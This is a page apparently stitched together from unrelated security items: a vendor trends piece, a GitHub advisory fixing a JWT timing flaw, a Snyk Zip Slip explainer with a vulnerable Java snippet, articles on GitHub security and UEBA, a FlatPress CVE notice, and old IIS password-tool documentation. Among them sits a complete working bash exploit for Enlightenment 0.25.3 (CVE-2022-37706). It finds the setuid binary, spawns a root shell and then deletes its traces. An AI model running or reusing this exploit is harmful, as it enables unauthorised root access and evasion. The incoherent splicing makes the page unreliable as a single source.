Digital transformation initiatives are challenging because IT still has to make sure performance doesn't suffer by making applications available from anywhere.

Over the past two years, many businesses have adopted hybrid work environments and begun migrating mission-critical applications to the cloud to allow their hybrid workforce to work from anywhere. However, combining working from anywhere with migrating applications such as Salesforce, SAP, Microsoft 365, and ServiceNow was an IT challenge because the networks needed to be improved.

The challenge was to reduce downtime and increase end user productivity. Even minor outages can impact operations, productivity, and profits, with Gartner suggesting that unplanned downtime costs US$5,600 per minute. To reduce such costs, businesses must quickly identify the root cause of outages and turn to intelligent digital experience monitoring solutions.

    

45 minutes of downtime costs more than a quarter million dollars. (Source: Gartner)

Businesses spent time rethinking the digital transformation journey to ensure they were delivering excellent performance while still securing users, workloads, and device communications over any network. As businesses look forward to 2023, three top digital experience monitoring trends emerge:

**Increase Hybrid Workforce Productivity**

Many businesses have accelerated digital business initiatives over the past couple of years to retain talent and optimize productivity. Companies like Zoom, Facebook, Google, and Apple adjusted their work-from-home policies to allow 100% remote and hybrid formats. Even healthcare businesses have enabled staff to work remotely, offering more telemedicine options and limiting in-person appointments.

Remote work is here to stay for the foreseeable future, as employees have proven that this hybrid model is possible. However, IT teams need to focus on keeping the business operational while ensuring excellent end user productivity. Supporting hybrid workers means having fast and reliable insights as issues arise from various devices, applications, and networks being used. For example, help desk and network operations teams need to know whether the user is having an issue with the local Wi-Fi connection or if there are problems with any of the network hops between the user's machine and where the application is hosted.

As hybrid workers become more adept at working from home, they learn basic connectivity troubleshooting steps, such as rebooting the home Wi-Fi router. In 2023, businesses need to be able to quickly recommend ways to solve end user problems without requiring users to open support tickets. IT teams need a global view of their environment to pinpoint areas of focus, and then to actively look at specific users to understand their challenges. This will reduce IT troubleshooting time while increasing end user productivity.

**Faster Mean Time to Resolution (MTTR) With Smart Technologies**

Service desk and network operations teams must look past traditional castle-and-moat architecture, change their work-from-home policies, and provide users with fast and reliable access from anywhere. To increase productivity, IT teams must diagnose an end user's situation quickly and confidently. They must analyze each device, dedicated network path, and application response times. That's the only way to grasp the end user's dilemma fully. To effectively analyze data from these segments and provide a meaningful response, IT teams will benefit from the help of AI and machine learning (ML).

In 2023, we’ll see continued growth in AI/ML-based technologies as they ingest more data and learn to apply insights across the board. The key will be the amount of data being ingested and analyzed. The intelligence will come from solutions that combine multiple facets of end user experience. For example, providing secure, fast, and reliable connections with the ability to triage issues based on collected data will separate solutions that offer combined capabilities from ordinary point products.

The FIFA World Cup used AI to produce some compelling projections . Imagine if the players knew exactly where to position the ball for a goal—it would be game-changing! Similarly, if service desk and network operations teams could similarly leverage AI, they would be able to quickly triage end user issues In 2023, let's spend less time with traditional operations troubleshooting guides and more with AI-based solutions.

As IT teams look to better understand their environments, they’ll need intelligent systems to provide trends and patterns holistically. In 2023, AI-based solutions should evolve to find trends and systematic issues. For example, imagine a view into your network that classified which ISPs were the most troublesome globally. You could create a plan to move off those ISPs or position them as backups, for instance. You could also use this knowledge to negotiate better terms with the ISP. Armed with AI-based insights, IT teams would have opportunities to optimize their environments and reduce potential outage scenarios.

**Reduce IT Costs With Monitoring Plus Security Solutions**

Macroeconomics will focus on reducing overall costs and increasing flexibility (consolidation). In 2023, businesses will not only look to remove siloed monitoring solutions around devices, networks, and applications; they will also look for solutions that combine monitoring and security. These two services fit together nicely.

With security issues on the rise, IT teams will continue to face pressure from executives on what happened, end user impact, and prevention techniques. The challenge will be trying to reduce costs while gaining this intelligence. Cloud-based solutions make it easier for IT teams to get started small, get comfortable with the solution, and then scale.

For example, when the economy shifts, more businesses look to consolidate through mergers and acquisitions. However, these business initiatives aren’t always predictable, and IT must ensure solutions are in place that can easily handle these shifts. With secure cloud-based solutions, IT teams can quickly focus on security and monitoring, and then scale while controlling costs .

One more way to reduce costs in 2023 will be to focus on using existing IT service management tools. For example, many businesses use ServiceNow—wouldn't it be great if digital experience monitoring could easily integrate into these solutions? IT teams could more easily adopt new digital experience monitoring solutions without changing their entire workflow. Continuing to reduce costs is all about intelligently gaining insights with smarter integrations.

Read more _Partner Perspectives_ from Zscaler.

Securing and Improving User Experience for the Future of Hybrid Work

Token validation methods are susceptible to a timing side-channel during HMAC comparison. With a large enough number of requests over a low latency connection, an attacker may use this to determine the expected HMAC.

**robbert229/jwt's token validation methods vulnerable to a timing side-channel during HMAC comparison**

Moderate severity GitHub Reviewed Published Dec 28, 2022 • Updated Dec 30, 2022

GHSA-5vw4-v588-pgv8: robbert229/jwt's token validation methods vulnerable to a timing side-channel during HMAC comparison

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 28

*   Code
*   Issues 7
*   Pull requests 1
*   Actions
*   Projects
*   Security
*   Insights

Permalink

Browse files

Merge pull request #13 from polezaivsani/fix\_timming\_sidechannel

Spoil timming side-channel attack when comparing macs

*   Loading branch information

2 parents 2eb16e9 + eddce24 commit ca1404ee6e83fcbafb66b09ed0d543850a15b654

Showing **1 changed file** with **1 addition** and **1 deletion**.

@@ -142,7 +142,7 @@ func (a \*Algorithm) validateSignature(encoded string) error {

  

b64SignedAttempt := base64.RawURLEncoding.EncodeToString(\[\]byte(signedAttempt))

  

if strings.Compare(b64Signature, b64SignedAttempt) != 0 {

if !hmac.Equal(\[\]byte(b64Signature), \[\]byte(b64SignedAttempt)) {

return errors.New("invalid signature")

}

  

**0 comments on commit ca1404e**

Please sign in to comment.

CVE-2015-10004: Merge pull request #13 from polezaivsani/fix_timming_sidechannel · robbert229/jwt@ca1404e

Due to improper path santization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory.

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand crafted and shared among developer communities such as StackOverflow.

The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.sh). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. If you’d like the information on this page in a downloadable technical white paper, click the button below.

Download Technical White Paper

Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive. The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.

**Exploitable Application Flow**

The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking. Let’s look through each of these in turn. First of all, the contents of the zip file needs to have one or more files that break out of the target directory when extracted. In the example below, we can see the contents of a zip file. It has two files, a good.sh file which would be extracted into the target directory and an evil.sh file which is trying to traverse up the directory tree to hit the root and then add a file into the tmp directory. When you attempt to cd .. in the root directory, you still find yourself in the root directory, so a malicious path could contain many levels of ../ to stand a better chance of reaching the root directory, before trying to traverse to sensitive files.

           
  5 Tue Jun 5 11:04:29 BST 2018 good.sh 20 Tue Jun 5 11:04:42 BST 2018 ../../../../../../../../tmp/evil.sh
          
  

The contents of this zip file have to be hand crafted. Archive creation tools don’t typically allow users to add files with these paths, despite the zip specification allowing it. However, with the right tools, it’s easy to create files with these paths.

The second thing you’ll need to exploit this vulnerability is to extract the archive, either using your own code or a library. The vulnerability exists when the extraction code omits validation on the file paths in the archive. An example of a vulnerable code snippet (example shown in Java) can be seen below.

     
  1   Enumeration<ZipEntry>entries = zip.getEntries(); 
  2   while (entries.hasMoreElements()) { 
  3       ZipEntry e = entries.nextElement(); 
  4       File f = new File(destinationDir, e.getName()); 
  5       InputStream input = zip.getInputStream(e); 
  6       IOUtils.copy(input, write(f)); 
  7   }
          
  

You can see on line 4, e.getName() is concatenated with the target directory, dir, without being validated. At this point, when our zip archive gets to our evil.sh, it will append the full path (including every ../) of the zip entry to the target directory resulting in evil.sh being written outside of the target directory.

To see Zip Slip in action,

watch us exploit the vulnerable java-goof application

, a sample application used to show many known vulnerabilities.

**Are you Vulnerable?**

You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation. Snyk is maintaining a GitHub repository listing all projects that have been found vulnerable to Zip Slip and have been responsibly disclosed to, including fix dates and versions. The repository is open to contributions from the wider community to ensure it holds the most up to date status.s.

**What action should you take?**

Here are some steps you can take to check if your project’s dependencies of code contain the Zip Slip vulnerability:

**1\. Search through your projects for vulnerable code.**  

Expand this section

Groovy

Expand this section

JavaScript

Expand this section

Ruby & Python

**2\. Add Zip Slip Security Testing to your application build pipeline**

If you’d prefer not to search through your direct and transitive dependencies (of which you likely have hundreds) to determine if you’re using a vulnerable library, you can choose a dependency vulnerability scanning tool, like Snyk. It’s a good practice to add security testing into your development lifecycle stages, such as during development, CI, deployment and production. You can test your own projects (all the ecosystems mentioned above are supported) to determine if they are vulnerable to Zip Slip.

**Other vulnerable projects**

Vulnerable projects include projects in various ecosystems that either use the libraries mentioned above or directly include vulnerable code. Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarQube, OpenTable, Arduino, ElasticSearch, Selenium, JetBrains and Google.

**Thank you!**

The Snyk security team would like for thank all the vendors, project owners and the community members that helped raise awareness, find and fix vulnerabilities in projects across many ecosystems.

CVE-2020-36566: Snyk Vulnerability Database | Snyk

The unfettered collaboration of the GitHub model creates a security headache. Follow these seven principles to help relieve the pain.

Last week Okta announced a security breach that involved an attacker gaining access to its source code hosted in GitHub. That's just the latest example in a long string of attacks gaining access to company source code in GitHub. Dropbox, Gentoo Linux, and Microsoft have all had their GitHub accounts targeted before.

With 90 million active users, GitHub is the most popular source code management tool for both open source and private enterprise code repositories. It's a major piece of fundamental infrastructure and the keeper of some of the most sensitive assets and data in the world.

It's no wonder that attackers are increasingly going after source code. In some cases, such as Okta, they might be trying to gain access to the source code. More often, the attackers are looking for sensitive information to use in a subsequent attack.

An attacker who can gain access to private source code can examine it for vulnerabilities and then exploit those vulnerabilities in subsequent attacks. Attackers can also harvest hardcoded keys, passwords, and other credentials that might be stored in GitHub to gain access to cloud services and databases hosted in AWS, Azure, or GCP. A single stolen repository can yield intellectual property, valid credentials, and a nice list of vulnerabilities in production software that are ready to be exploited.

Shiny Hunters, an attack group known to specifically target private GitHub repositories, has breached tens of companies using this technique, and sold their data across various Dark Web marketplaces.

**Securing the Organization's GitHub Environment**

There is no question that GitHub is a critical part of the organization's infrastructure, but locking it down is a complex and challenging identity security problem. The beauty of the GitHub model is that it allows for unfettered collaboration, but that also creates one of the biggest headaches in modern IT security.

Just think about it: Anyone remotely technical in 2022 has a GitHub account. And you can use your GitHub account for everything. We can use these accounts for personal side projects, open source contributions, and our work in public and private code repositories that are ultimately owned by our employers. That is a lot of heavy lifting for a single identity!

You can also use the "Sign in with GitHub" feature to use your GitHub identity in other websites and services outside of just GitHub itself. And there's more: GitHub is unique in that you don't just sign in to their website, you also pull, push, and clone code from GitHub's servers down to your local machine via git operations over HTTPS and SSH, which themselves require your GitHub identity.

Clearly GitHub picked up on these security implications when it announced the deprecation of usernames and passwords for git operations last year — a step in the right direction.

**7 Tips for Securing Your GitHub**

While GitHub provides tools to lock down the environment, organizations need to know how to use them. Unfortunately, some of the most important security capabilities require GitHub Enterprise. Nonetheless, here are seven principles for better GitHub security.

1.  **Don't allow personal accounts for work.** We get it, your company has a few public repositories and you can build your credibility by showing off some public contributions in your next job interview. Your personal GitHub account is part of your brand. Unfortunately, this is also one of the biggest holes in organizations using GitHub today: They do not strictly govern the use of personal accounts for work purposes. As tempting as it might be, personal accounts should not be used for work. There's just no way to control who has access to that personal Gmail address that you used to create your personal GitHub account.
2.  **Require authentication via company SSO.** Unfortunately, GitHub shows up prominently on the SSO Wall of Shame. That's right — you need to pay extra for SSO integration. Once you have GitHub Enterprise, you can connect GitHub to your company SSO, such as Okta or Azure AD or Google Workspace, and you can lock down your organization to only allow authentication via SSO.
3.  **Require 2FA on all accounts.** Even if you enforce two-factor authentication (2FA, aka MFA) via your SSO and also require SSO authentication, the safest option is to still enforce 2FA for all GitHub users in your organization. Exemption groups and policy exceptions in your SSO provider can make SSO MFA easy to bypass.
4.  **Use SSH Keys for git operations.** While GitHub has introduced fine-grained permissions control with personal access tokens (PATs), they remain susceptible to phishing as these tokens are often copied around in plaintext. By using SSH keys for authentication for git operations, your organization can use thoughtful PKI to govern how SSH keys are provisioned, and can also tie this to your company's device management and your own certificate authority (CA).
5.  **Restrict repository member privileges using roles.** GitHub offers several different repository roles that can be assigned based on the principle of least privilege. Base permissions can be controlled at the organization level. Always take care to assign the least privileged role that a member needs to be productive. Don't make everyone an admin.
6.  **Don't allow outside collaborators.** Working with contractors is a normal part of managing large software projects. However, the governance surrounding outside collaborators in GitHub is insufficient to keep your organization secure. Instead, force outside collaborators to authenticate via your company SSO, and do not allow repository admins to invite them directly to your organization's repositories.
7.  **Audit, analyze, and audit again.** No organization is perfect; even with the best policies in place, accounts fall through the cracks and mistakes are made. Even before locking down your GitHub organization, take the time to implement a regular audit process to look for dormant accounts that are not using their access and to limit the number of privileged roles in your repositories. Once your environment is locked down, keep an eye out for policy violations, such as a user who is somehow still authenticating outside of your SSO or not using 2FA.

The breach of Okta's GitHub repository is a powerful example of just how hard it is to protect identities within enterprises, but it isn't a unique one. Every day we see what happens when employees and contractors experience account takeover. We see the effects of weak authentication, lax policies for personal email accounts, and the ever-expanding size of the identity attack surface.

Unfortunately, this latest incident is just one part of a growing trend of identity-related breaches to watch for in 2023.

Why Attackers Target GitHub, and How You Can Secure It

Security teams are considering how to get the most out of user entity behavioral analytics by taking advantage of its strengths and augmenting its limitations.

Rogue insiders and external attackers have become a growing concern in enterprise business applications.

External attackers leverage stolen credentials to impersonate an insider and connect to applications, while at the same time insiders are not sufficiently monitored in SaaS and home-grown applications. This poses a risk from employees and admins who might misuse and engage in malicious activities.

Detection solutions for users, networks and devices are based on two main technologies: rules and patterns that define illegal or malicious behavior; and statistical volumetric/frequency methods based on averages and standard deviations of activities, such as the number of logins or number of emails.

These technologies are often referred to as user entity behavioral analytics (UEBA). They set baselines for average, standard deviation, median, and other statistical metrics, and then detect abnormal values using these baselines.

**Users Don't Always Follow Rules**

Doron Hendler, co-founder and CEO of RevealSecurity, says rules and UEBA have been effective due to major commonalities in the network, device, and user access layers: The market by and large uses a limited set of network protocols and a handful of operating systems.

"However, when it comes to the application layer, UEBA has failed due to the vast dissimilarities between applications," he says.

Hendler explains that over a decade ago, the security market adopted statistical analysis to augment rule-based solutions to provide more accurate detection for the infrastructure and access layers.

"However, UEBA failed to deliver as promised to dramatically increase accuracy and reduce false positive alerts due to a fundamentally mistaken assumption: that user behavior can be characterized by statistical quantities, such as the average daily number of activities," he says.

He argues this mistaken assumption is built into UEBA, which characterizes a user by an average of activities. "In reality though, people don't have average behaviors, and it is thus futile to try and characterize human behavior with quantities such as 'average', 'standard deviation', or 'median' of a single activity," he says.

**UEBA Only Works With the Right Data**

David Swift, principal security strategist at Netenrich, says too many companies go into UEBA without changing their thinking about how security event management should work.

"Before ever talking to a vendor, a customer should identify the most important data to the business — these will indicate log data needed — and define the use cases that would constitute a threat, which define the individual indicators and triggers used to build content," he says. Then they must build models that correlate multiple events and multiple correlations for positive confirmation.

"UEBA only works with the right data," Swift adds. "Most failed implementations never pulled in identity data, or key applications. Without identity, there is no 'user' in UEBA. Without application events, it's still solving the same old problem — malware detection."

From his perspective, UEBA is highly successful when a company-critical application and IAM data are included in the deployment.

"When a new business-critical application is analyzed for anomalies, the value to the business when we find insiders and compromised accounts is high," he explains. "When UEBA is used as better malware detection and new data sources aren't used, it's destined to fail."

Relative to false positives, which UEBA is supposed to help reduce, Swift adds that anomaly-based rules were never meant to have zero false positives.

"Threat chains were always meant to combine multiple indicators into a model with low false positives," he explains. "It's always been about models that link multiple indicators together, if we're going to reduce false positives." He adds that when done well, threat chains do yield a low (roughly 3%) false-positive rate.

**Use Cases for UEBA**

Mike Parkin, senior technical engineer at Vulcan Cyber, says that UEBA can be successful in cases where the user's behavior is very consistent.

For example, with call center personnel, who work from specific locations at specific times, changes in their behavior are obvious.

"On the other hand, people who work in the field, such as salespeople visiting customers, are much more difficult to predict," he says.

Although he says he doesn't think the assumption of individuals possessing "average behaviors" is entirely mistaken, the margin of error for people's behavior is "very, very" broad.

He notes some characteristics, such as typing cadence, can be very distinct, but work patterns, including locations and resource access, can be much more variable. "Keeping UEBA applications focused on the kind of behaviors they can accurately predict will make them more effective, as will the applications themselves improving their analytics to better predict a broader range of behaviors," he adds.

From Swift's perspective, there is no "average" — there is only learned behavior and anomalous behavior.

"People are creatures of habit," he says. "Learning what's unique about a user or a machine isn't hard."

In database terms, this means building a second database outside of the events. SQL statements like "select from where unique" identify normal events; then they must be counted and summed up.

"It's pretty simple to build behavior profiles, and they do work," Swift says. "Peer anomalies — you did something others like you don't do — are a bit less cut and dry, and many are snowflakes. But even with peer groups like title and department, most fall within the norms."

Parkin points out not every UEBA application is created equal and there is a lot of variation in effectiveness between them, even within the same application as it looks at different aspects of behavior.

"Overall, \[UEBA\] can be a valuable addition to the stack, but it's not a silver bullet that can magically identify every threat," he says.

How to Get the Most out of UEBA

Enlightenment version 0.25.3 suffers from a local privilege escalation vulnerability.

    ## Title: Enlightenment Version: 0.25.3 LPE## Author: nu11secur1ty## Date: 12.26.2022## Vendor: https://www.enlightenment.org/## Software: https://www.enlightenment.org/download## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706## Description:The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.Enlightenment_sys in Enlightenment before 0.25.4 allows local users togain privileges because it is setuid root,and the system library function mishandles pathnames that begin with a/dev/.. substringIf the attacker has access locally to some machine on which themachine is installed Enlightenmenthe can use this vulnerability to do very dangerous stuff.## STATUS: CRITICAL Vulnerability## Tested on:```bashDISTRIB_ID=UbuntuDISTRIB_RELEASE=22.10DISTRIB_CODENAME=kineticDISTRIB_DESCRIPTION="Ubuntu 22.10"PRETTY_NAME="Ubuntu 22.10"NAME="Ubuntu"VERSION_ID="22.10"VERSION="22.10 (Kinetic Kudu)"VERSION_CODENAME=kineticID=ubuntuID_LIKE=debianHOME_URL="https://www.ubuntu.com/"SUPPORT_URL="https://help.ubuntu.com/"BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"UBUNTU_CODENAME=kineticLOGO=ubuntu-logo```[+] Exploit:```bash#!/usr/bin/bash# Idea by MaherAzzouz# Development by nu11secur1tyecho "CVE-2022-37706"echo "[*] Trying to find the vulnerable SUID file..."echo "[*] This may take few seconds..."# The actual problemfile=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)if [[ -z ${file} ]]then  echo "[-] Couldn't find the vulnerable SUID file..."  echo "[*] Enlightenment should be installed on your system."  exit 1fiecho "[+] Vulnerable SUID binary found!"echo "[+] Trying to pop a root shell!"mkdir -p /tmp/netmkdir -p "/dev/../tmp/;/tmp/exploit"echo "/bin/sh" > /tmp/exploitchmod a+x /tmp/exploitecho "[+] Welcome to the rabbit hole :)"${file} /bin/mount -onoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),"/dev/../tmp/;/tmp/exploit" /tmp///netread -p "Press any key to clean the evedence..."echo -e "Please wait... "sleep 5rm -rf /tmp/exploitrm -rf /tmp/netecho -e "Done; Everything is clear ;)"```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)## Proof and Exploit:[href](https://streamable.com/zflbgg)## Time spent`01:00:00`

Enlightenment 0.25.3 Privilege Escalation

A vulnerability was found in FlatPress. It has been classified as critical. This affects the function doItemActions of the file fp-plugins/mediamanager/panels/panel.mediamanager.file.php of the component File Delete Handler. The manipulation of the argument deletefile leads to path traversal. The name of the patch is 5d5c7f6d8f072d14926fc2c3a97cdd763802f170. It is recommended to apply a patch to fix this issue. The identifier VDB-216861 was assigned to this vulnerability.

CVE-2022-4748

Password Manager for IIS 2.0 has a cross-site scripting (XSS) vulnerability via the /isapi/PasswordManager.dll ResultURL parameter.

**Year 2000 statement**

Password Manager for IIS does not include any time or date oriented functionality or code. Thus, it can be safely assumed that the product itself will perform well in the year 2000 and above.

However, it is dependant on the operating system and web server it is running on. Please see the supplying vendors notices for their product's year 2000 compliance. In the case of Password Manger for IIS, this is mainly Microsoft (which can be found at http://www.microsoft.com). Other vendor information might also apply, e. g. if you use a third party IP stack.

**Installation**

Password Manager for IIS is high performing tool using only minimal system resources. It also doesn't require an extended installation process.

**System Requirements**

This product is compatible with all versions of Microsoft IIS. It supports Windows NT 4, Windows 2000, Windows 2003 and Windows XP.

Active Directory users please note: Password Manager for IIS does run without any problems on Windows 2000. Many users use it with great success in Active Directory environments. However, Password Manager uses NT domain API calls to change the password, so you need to refer to the short name to all objects and domains.

**The Installation Process**

Actual installation is very straightforward

1.  unzip the install set
2.  copy PasswordManager.dll (the ISAPI extension DLL) to any web directory on your IIS you like. Make sure, you have excute permissions inside IIS for this directory set (not only scripting!).
3.  copy the sample password change dialog and customize it according to your needs (or create your own from scratch).

The product does not perform or require any registry modifications.

**Uninstallation**

There is no need for any formal uninstallation process. Simply delete the ISAPI extension DLL (PasswordManager.dll) as well as any page you are using Password Manger for IIS on.

**Usage**

Password Manager for IIS is a standard ISAPI extension callable from any HTTP form. You can include it into your web site by creating a simple (or sophisticated ;-) ) web form with your favourite HTML editor (like Microsoft Frontpage or Macromedia DreamWeaver).

The "ACTION" tag of the html form must point to the PasswordManager.dll ISAPI extension. Be sure to specify the correct path to the DLL. This is depending on where you copied the DLL to and where your actual form resides. If ever in doubt, use a full name like: http://www.yourserver.com/yourdirectory/passwordmanger.dll. The form needs to include the following fields:

**FieldName**

**Used for**

LANGUAGE

Select language for response text generated by Password Manager for IIS. Supported values are "DE" for German, "BR" for Brazilian Portugese and "EN" for English. This field can be omitted and defaults to English.

DOMAIN

Name of the NT Domain that is to be used for password changes. Only users from this domain can change their password (if you have multiple domains, the users needs to enter the correct one or select it from a list box).

Please note: if you run Password Manager for IIS in a workgroup environmen, this parameter must hold the computer name, NOT the workgroup name!

This field is mandatory.

RESULTURL

The URL PasswordManager redirects to after it tried to change the password. This URL is called from within Password Manager. We recommend it to be a fully qualified name (e.g. starting with HTTP). This URL will be passed the outcome of the operation as parameter "state". It is up to the page residing at this URL to decode "state" and provide feedback to the user. The URL is called as follows:

RESULTURL?state=OperationStatus

See appendix for statuses.

Please note: unregistered versions of Password Manager will redirect after a 10 second delay only.

If this field is not specified, Password Manager provides a default status form.

USER

NT User name (without domain part) of the users who's password needs to be changed.

OLDPWD

Old password

NEWPWD

New password

NEWPWDCONFIRM

Confirmation of new password. NEWPWD & NEWPWDCONFIRM need to be identical, otherwise password manager for IIS does not change the users' password.

**Sample**

The following is a simple sample form. It assumes that PasswordManager is stored in a directory named "ISAPI" that is on the same directory level as the one the form is stored in. One example might be:

"<web-root>/forms" for the form's html file and  
"<web-root>/ISAPI" for the extension DLL

<html>  
										<head>  
										<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
										<title>Change Domain Password</title>  
										</head>  
										<body>  
										<p><strong><big>Change Domain 
										Password</big></strong></p>  
										<form method="post" action="../isapi/PasswordManager.dll">  
										<input type="hidden" name="Language" value="EN">  
										<input type="hidden" name="Domain" value="YOURNTDOMAIN">  
										<div align="left"><table border="0" cellpadding="0" 
										cellspacing="0">  
										<tr>  
										<td><strong>User Name</strong></td>  
										<td><input type="text" name="User" size="20"></td>  
										</tr>  
										<tr>  
										<td><strong>Current Password</strong></td>  
										<td><input type="password" name="OldPwd" size="20"></td>  
										</tr>  
										<tr>  
										<td><strong>New Password</strong></td>  
										<td><input type="password" name="NewPwd" size="20"></td>  
										</tr>  
										<tr>  
										<td><strong>New Password Confirmation</strong></td>  
										<td><input type="password" name="NewPwdConfirm" 
										size="20"></td>  
										</tr>  
										<tr>  
										<td><strong></strong></td>  
										<td><input type="submit" value="Change Password!">  
										    <input type="reset">  
										</td>  
										</tr>  
										</table>  
										</div>  
										</form>  
										</body>  
										</html>  
									

The example above is for a simple change password dialog with no customised result page. Inside the install set is a more complex sample.

These sample assumes that the sample-form.htm and MyResultPage.asp files are copied in a web root. There should be a directory named "isapi" in wich PasswordManger.dll resides. Sample-form.htm is basically the same sample as above, but references MyResultPage.asp as a customized result page. Once PasswordManager has done it's actions, it calls this page with a parameter "state". MyResultPage.asp evaluates this "state" variable and displays an appropriate message. You are free to do whatever you want inside this result page.

Please note that the unregistered version of Password Manager has a delay of 10 seconds before redirecting to the result page. The registered version will immediately redirect.

**Status Codes**

The following status codes are used by Password Manager to indicate the outcome of the change password operation:

**Code**

**Meaning**

0

success (all others indicate failure)

5 or 53

PDC not found.  
Most probable causes are:

*   Domain name misspelled
*   PDC actually down (powered off or otherwise offline)
*   If Password Manager for IIS is to be used in a Workgroup environment, Parameter DOMAIN must hold the computer name, NOT the workgroup name.
*   User restriction "Can't change password" checked in user manager

86

Old Password incorrect

2245

New password is too short.

2221

Invalid Username. Most probably typo, user account does not exist.

4294967295

Fields "New Password" and "New Password Confirm" do not match.

**Version History**

This short history shall provide you with some background information about the versions available as well as their pros and cons.

**1.0**

This is the initial release.

**1.1**

Some minor bug fixes.

**2.0**

*   Fully compatible with Windows 2000 (tested with build 2072)
*   Error Reporting Improved (less "error xx occured")
*   Portugese Language versions available
*   Paramter "RESULTURL" added. This allows to fully customize the whole change password process.

**How to obtain Updates**

Please visit our web site http://www.Adiscon.com for information about new and updated products. Registered users will receive notification of new versions via email. The registration is valid for the current major release as well as the next one (in this case 3.0).

**License**

Password Manager for IIS is distributed as **Shareware**. You are free to use the product for evaluation. However, if you feel comfortable with it and plan to use it for an extended period of time, you must **register** with Adiscon and pay the license fee.

We do not want to restrict the length of the evaluation period by some kind of software mechanism. However, we think an evaluation period of 1 month should be reasonable for all parties interested.

Please support further development by registering the product. There is a license fee per Windows NT system Password Manager for IIS is running on. You need only one license per machine, even if you run multiple virtual servers on a single machine or have multiple CPUs inside it.

For orders outside of Germany, the licnse fee is $US 89 (plus tax if applicable). EU residents with VAT identification number should state this number in order to get an tax exemption. If not stated, full VAT will be charged. All EU orders will be processed in Euro. US$ payment is available for international customers, only.

Please call for volume orders.

BBS sysops feel free to include the distribution set of this product in your library. Please be sure to include the full set (program & this documentation). Any questions can be directed at Info@Adiscon.com.

**Are there any restrictions in the unregistered version?**

Nope - we don't like "crippleware". However, the unregistred version does identify itself as unregistered in its responses to password change requests. Based on experience we needed to introduced a slight delay whith the RESULTURL version - if we hadn't done this, nobody would ever see the "unregistered" message. We think this is fair.

**How to register**

Registration is as simple as 1-2-3:

1.  Print out the following registration form
2.  Please fill it in. Remember to include number of licenses requested and payment information **as well as your email id**.
3.  Mail or fax the registration form to Adiscon.

We accept cash (bills please - and: no faxed ones, please ;-) ) as well as MasterCard/Eurocard or American Express cards. We also accept payment by check if - and only if - the following criteria is met:

If you are paying in US$, your check must be drawn on an US American bank and made payable to "Rainer Gerhards" (very important, do not make payable to Adiscon GmbH!).

We are currently working on secure online payment systems.

If you need an additional payment options, please contact us at Info@Adiscon.com or the below given addresses. Please note that - for your security - we generally do not accept email registrations. We strongly encourage you **never** to transmit your credit card information in clear text over the Internet.

Direct your registrations to:

Adiscon GmbH  
Franz-Marc Strasse 144  
50374 Erftstadt  
Germany

Fax: +49-9349-928820  
email: Info@Adiscon.com  
Web: http://www.Adiscon.com

Due to German laws all credit card orders need to be processed in DEM. US$ payments will be converted to DEM according to current exchange rate. There might be a slight difference in the converted value due to exchange rate differences.

**Registration / Order Form**

**Password Manager for IIS  
Registration / Order**

Company

 

**Name**

 

Address

 

Country

 

Phone

 

Fax

 

**email**

 

VAT registration number (EU residents only)

 

**Nbr. of Licenses**

 

**Payment**

o Cash o MasterCard o American Express o Check  
o JCB  o VISA 

**Price**

 

**Credit Card Information**

Card Number: \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Cardholder Name (as imprinted on card): \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Expiration Date \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Please be sure to specify your email address, number of licenses requested and payment information (fields in bold typeface).

Please sign below:

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_  
Date & Signature

and forward this form to

Adiscon GmbH  
Paul-Klee-Str. 7  
50374 Erftstadt  
Germany

